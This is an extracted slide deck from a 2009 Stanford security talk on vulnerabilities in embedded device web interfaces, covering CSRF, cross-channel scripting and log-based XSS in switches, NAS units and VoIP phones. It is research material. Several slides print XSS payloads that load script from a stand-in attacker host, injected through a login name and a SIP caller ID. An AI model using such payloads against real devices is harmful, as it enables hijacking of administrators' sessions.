embedded management interfaces
play

Embedded Management Interfaces e t u p m Emerging Massive - PowerPoint PPT Presentation

Dec 02, 2022 •254 likes •1.86k views

b a L y t i r u c e S r Embedded Management Interfaces e t u p m Emerging Massive Insecurity o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Thursday, July 30, 2009

  1. Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  2. Cross Site Request Forgery (CSRF) illustrated Netgear FS750T2 ‣ Intelligent switch ‣ Configured via Web Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  3. CSRF illustrated Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  4. CSRF illustrated 1 Administer the switch Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  5. CSRF illustrated 1 Administer the switch 2 Browse the web � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  6. CSRF illustrated 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  7. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  8. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  9. CSRF illustrated 4 Forward the bad post request 1 Administer the switch 2 Browse the web P O S T ( e . g . v i a A d s ) 3 T r i g g e r � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  10. Cross Channel Scripting (XCS) illustrated LaCie Ethernet disk mini ‣ Share access control ‣ Web interface ‣ Public FTP Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  11. XCS illustrated FTP server NAS upload the file: <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  12. XCS illustrated FTP file server system NAS upload the file: <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  13. XCS illustrated FTP file Web server system App NAS upload the file: reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Admin Browser Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  14. XCS illustrated FTP file Web server system App NAS upload the file: reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  15. Attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  16. XCS: cross-channel scripting Alternate Web Channels attacker Device User Injection Storage Reflection Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  17. Devices as stepping stones Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  18. Devices as stepping stones 1 Administer the device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  19. Devices as stepping stones 1 Administer the device 2 Browse internet Internet Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  20. Devices as stepping stones 1 Administer the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  21. Devices as stepping stones 4 infect the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  22. Devices as stepping stones 5 access files Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  23. Devices as stepping stones 6 Send malicious payload 5 access files Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  24. Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  25. Devices as stepping stones 6 Send malicious payload 5 access files 7 Attack local network Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  26. Brands Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  27. Devices Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  28. Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  29. Vulnerabilities by category Type Num XSS CSRF XCS RXCS File Auth LOM 3 Photo 3 NAS 5 Router 1 IP camera 3 IP phone 1 Switch 4 Printer 3 one vulnerability many vulnerability Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  30. Devices by Brand Brand Camera LOM NAS Phone Photo Frame Printer Router Switch � Allied � Buffalo � � D-Link � Dell � eStarling � HP � IBM � Intel � Kodak � LaCie � � � � Linksys � Netgear � Panasonic � QNAP � Samsung � SMC � TrendNet Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  31. Attack surface • Confidentiality • Integrity • Availability • Access control • Attribution Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  32. Attack surface result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  33. Attack surface result Confidentiality 5 Steal private data Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  34. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  35. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  36. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access files without Access control 23 password Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  37. Attack surface result Confidentiality 5 Steal private data Integrity 22 Reconfigure device Availability 18 Reboot device Access files without Access control 23 password Attribution 22 Don’t log access Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  38. b a L y t i r u c e S r e t u p m o Illustrative Attacks C d r o f n a t S Thursday, July 30, 2009

  39. Login+Log XSS Quick warm-up: LOM LOM basics Log XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  40. Login+Log XSS LOM basics ‣ Lights-out recovery, maintenance, inventory tracking ‣ PCI card and chipset varieties available ‣ Separate NIC and admin login* ‣ Low-security default settings ‣ Motherboard connection ‣ Usually invisible to OS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  41. Login+Log XSS Log XSS ‣ Known for a decade ‣ Traditionally injected via DNS ‣ Also see recent IBM BladeCenter advisory http://www.cert.fi/en/reports/2009/vulnerability2009029.html Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  42. Persistant Log-based XSS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  43. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  44. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  45. Persistant Log-based XSS 1 Attacker attempts to login as user ");</script><script src="//evil.com/"></script><script> 2 Admin views syslog � � � � � � � � 3 Payload executes Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  46. Login+Log XSS attack result Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  47. Cross Channel Scripting (XCS) Moving on to real XCS VoIP phone Photo frame Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  48. SIP XCS VoIP phone ‣ Linksys SPA942 ‣ Web interface ‣ SIP support ‣ Call logs Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  49. SIP XCS � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  50. SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain � � � � � � � � Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  51. SIP XCS 1 SIP: xyz@mydomain calls abc@thatdomain � � � � � � � � 2 RTP: carries actual binary data Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  52. SIP XCS Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  53. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

  54. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface Hristo Bojinov Elie Bursztein Dan Boneh Embedded Management Interfaces Emerging Massive Insecurity Thursday, July 30, 2009

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Effects of I/O Routing Through Column Interfaces in Embedded FPGA Fabrics Christophe Huriaux

Effects of I/O Routing Through Column Interfaces in Embedded FPGA Fabrics Christophe Huriaux

26 th International Conference on Field Programmable Logic and Applications September 1 st , 2016 Effects of I/O Routing Through Column Interfaces in Embedded FPGA Fabrics Christophe Huriaux , Olivier Sentieys , Russell Tessier Inria,

480 views • 21 slides
Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo

Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo

b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Cross-channel scripting

1.09k views • 68 slides
CSSE 220 Interfaces and Polymorphism Check out Interfaces from SVN Interfaces What, When,

CSSE 220 Interfaces and Polymorphism Check out Interfaces from SVN Interfaces What, When,

CSSE 220 Interfaces and Polymorphism Check out Interfaces from SVN Interfaces What, When, Why, How? What: Code Structure used to express operations that multiple class have in common No method implementations No fields

611 views • 12 slides
Serial Communications time. 3 4 Serial Interfaces Serial vs. Parallel Different from a

Serial Communications time. 3 4 Serial Interfaces Serial vs. Parallel Different from a

1 2 Serial Interfaces Embedded systems often use a serial interface to communicate with other devices. Serial implies that it sends or receives one bit at a Serial Communications time. 3 4 Serial Interfaces Serial vs. Parallel

225 views • 6 slides
Embedded Systems an integrated computational, electrical, and mechanical system

Embedded Systems an integrated computational, electrical, and mechanical system

Embedded Systems Embedded Systems an integrated computational, electrical, and mechanical system www-robotics.cs.umass.edu/~grupen/503 hardware (sensors, actuators), software with RT constraints, interfaces Overview of Our Course low

189 views • 4 slides
T Topic 7 i 7 Interfaces and Abstract Interfaces and Abstract Classes Interfaces Interfaces

T Topic 7 i 7 Interfaces and Abstract Interfaces and Abstract Classes Interfaces Interfaces

T Topic 7 i 7 Interfaces and Abstract Interfaces and Abstract Classes Interfaces Interfaces I prefer Agassiz in the abstract, rather than in the concrete. CS 307 Fundamentals of CS 307 Fundamentals of 1 2 Computer Science

325 views • 10 slides
Component technology in an embedded system David Polberger Masters thesis defense January 27,

Component technology in an embedded system David Polberger Masters thesis defense January 27,

Preliminaries Introduction Evolution Interfaces and COM Sony Ericsson Summary Component technology in an embedded system David Polberger Masters thesis defense January 27, 2010 Preliminaries Introduction Evolution Interfaces and COM

431 views • 28 slides
Implementation, Visualization and User Interfaces Advanced Herd Management Thomas N. Madsen

Implementation, Visualization and User Interfaces Advanced Herd Management Thomas N. Madsen

Implementation, Visualization and User Interfaces Advanced Herd Management Thomas N. Madsen Technology | Network | Management Advanced Herd Management - Implementation, Visualization and User Interfaces Outline GUI Design Making

318 views • 11 slides
Embedded PC The modular Industrial PC for mid-range control Embedded PC 1 Embedded OS

Embedded PC The modular Industrial PC for mid-range control Embedded PC 1 Embedded OS

Embedded PC The modular Industrial PC for mid-range control Embedded PC 1 Embedded OS Operating Systems Major differences Details XPE / CE Embedded PC 2 The Windows Embedded OS family The modular, real The modular, real- -time

611 views • 22 slides
Interfaces Interfaces interface : A list of methods that a class promises to implement.

Interfaces Interfaces interface : A list of methods that a class promises to implement.

Interfaces Interfaces interface : A list of methods that a class promises to implement. Interfaces give you an is-a relationship without code sharing. Only method stubs in the interface Allows object with no common ancestor to act

268 views • 13 slides
Interaction Management for Ubiquitous Augmented Reality User Interfaces CAR - Car Augmented

Interaction Management for Ubiquitous Augmented Reality User Interfaces CAR - Car Augmented

Diplomarbeit Interaction Management for Ubiquitous Augmented Reality User Interfaces CAR - Car Augmented Reality Aufgabensteller: Prof. Gudrun Klinker Ph.D. Betreuer: Dipl.-Inform. Christian Sandor Vortragender: Otmar Hilliges May 13,

740 views • 36 slides
Interfaces Interfaces n interface : A list of methods that a class promises to implement. q

Interfaces Interfaces n interface : A list of methods that a class promises to implement. q

10/21/12 Interfaces Interfaces n interface : A list of methods that a class promises to implement. q Interfaces give you an is-a relationship without code sharing. Only method stubs in the interface n Allows object with no common

420 views • 7 slides
Unit D time. Serial Communications D.3 D.4 Serial vs. Parallel Parallel Interfaces Serial

Unit D time. Serial Communications D.3 D.4 Serial vs. Parallel Parallel Interfaces Serial

D.1 D.2 Serial Interfaces Embedded systems often use a serial interface to communicate with other devices. Serial implies that it sends or receives one bit at a Unit D time. Serial Communications D.3 D.4 Serial vs. Parallel

174 views • 6 slides
Xen Management Interfaces using DMTF CIM Technology Mike D. Day IBM CIM Technology Overview

Xen Management Interfaces using DMTF CIM Technology Mike D. Day IBM CIM Technology Overview

Xen Management Interfaces using DMTF CIM Technology Mike D. Day IBM CIM Technology Overview What is CIM Technology? Schema Description Language Object semantics Inheritance of schema elements Methods and Properties

359 views • 7 slides
CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focusses on creating user interfaces (UIs), including underlying UI architecture and algorithms, practice implementing UIs using frameworks, and theories and methods relevant to interface design.

603 views • 24 slides
CS 349: User Interfaces This course focuses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focuses on creating user interfaces (UIs), including

CS 349: User Interfaces This course focuses on creating user interfaces (UIs), including underlying UI architecture and algorithms, practice implementing UIs using frameworks, and theories and methods relevant to interface design.

600 views • 20 slides
Ethics in the age of Informatics, Big Data and AI Professor dr. May Thorseth, Dept. of Philosophy

Ethics in the age of Informatics, Big Data and AI Professor dr. May Thorseth, Dept. of Philosophy

Ethics in the age of Informatics, Big Data and AI Professor dr. May Thorseth, Dept. of Philosophy and Religious Studies, NTNU Director of Programme for Applied Ethics, NTNU Email: may.thorseth@ntnu.no Informatics Europe 2018 Chalmers 9

581 views • 28 slides
Finding Third - party Risks Fourteenforty Research Institute, Inc.

Finding Third - party Risks Fourteenforty Research Institute, Inc.

Fourteenforty Research Institute, Inc. Kyoto, 2012 FIRST Technical Colloquium Sma martphone tphone Securi ecurity ty and Finding Third - party Risks Fourteenforty Research Institute, Inc. http://www.fourteenforty.jp Tsukasa Oi

644 views • 36 slides
Protecting Users by Confining JavaScript with SWAPI Deian Stefan, Petr Marchenko, Brad Karp,

Protecting Users by Confining JavaScript with SWAPI Deian Stefan, Petr Marchenko, Brad Karp,

Protecting Users by Confining JavaScript with SWAPI Deian Stefan, Petr Marchenko, Brad Karp, David Mazires, Dave Herman, and John C. Mitchell Modern websites are complex Modern websites are complex Modern websites are complex Page code

1.65k views • 97 slides
Vector-Boson + Multi-Jet Production with BlackHat David A. Kosower Institut de Physique

Vector-Boson + Multi-Jet Production with BlackHat David A. Kosower Institut de Physique

Vector-Boson + Multi-Jet Production with BlackHat David A. Kosower Institut de Physique Thorique, CEASaclay on behalf of the BlackHat Collaboration Carola Berger, Z. Bern, L. Dixon, Fernando Febres Cordero, Darren Forde, Harald Ita, DAK,

310 views • 29 slides
1 Logic for Reasoning about Truth: Outline Where Should We Start? Prereqs, Learning Goals,

1 Logic for Reasoning about Truth: Outline Where Should We Start? Prereqs, Learning Goals,

snick Introductions, again snack Steven Wolfman &lt;wolf@cs.ubc.ca&gt; CPSC 121: Models of Computation ICICS 239; office hours listed on the website 2016W2 I also have an open door policy: If my door is open, come in and talk!

623 views • 5 slides
Spear Phishing: Email versus Facebook Joint work with Freya Gassmann, Anna Girard, Nadina Hintz,

Spear Phishing: Email versus Facebook Joint work with Freya Gassmann, Anna Girard, Nadina Hintz,

Dagstuhl Seminar: Cybersafety in Modern Online Social Networks September 2017 Spear Phishing: Email versus Facebook Joint work with Freya Gassmann, Anna Girard, Nadina Hintz, Robert Landwirth, Andreas Luder Zinaida Benenson

356 views • 8 slides
Black Holes (Sec. 22.5, 6, 7, 8 in textbook) 22.5 Black Holes The mass of a neutron star cannot

Black Holes (Sec. 22.5, 6, 7, 8 in textbook) 22.5 Black Holes The mass of a neutron star cannot

Black Holes (Sec. 22.5, 6, 7, 8 in textbook) 22.5 Black Holes The mass of a neutron star cannot exceed about 3 solar masses. If a core remnant is more massive than that, nothing will stop its collapse, and it will become smaller and smaller and

609 views • 14 slides
Primordial Black Holes in Cosmology Lectures 1 &amp; 2 : What are PBHs? Do they exist? Massimo

Primordial Black Holes in Cosmology Lectures 1 &amp; 2 : What are PBHs? Do they exist? Massimo

Primordial Black Holes in Cosmology Lectures 1 &amp; 2 : What are PBHs? Do they exist? Massimo Ricotti (University of Maryland, USA) Institute of Cosmos Sciences, University of Barcelona 23/10/2017 What are Primordial Black Holes? May have

749 views • 34 slides

More recommend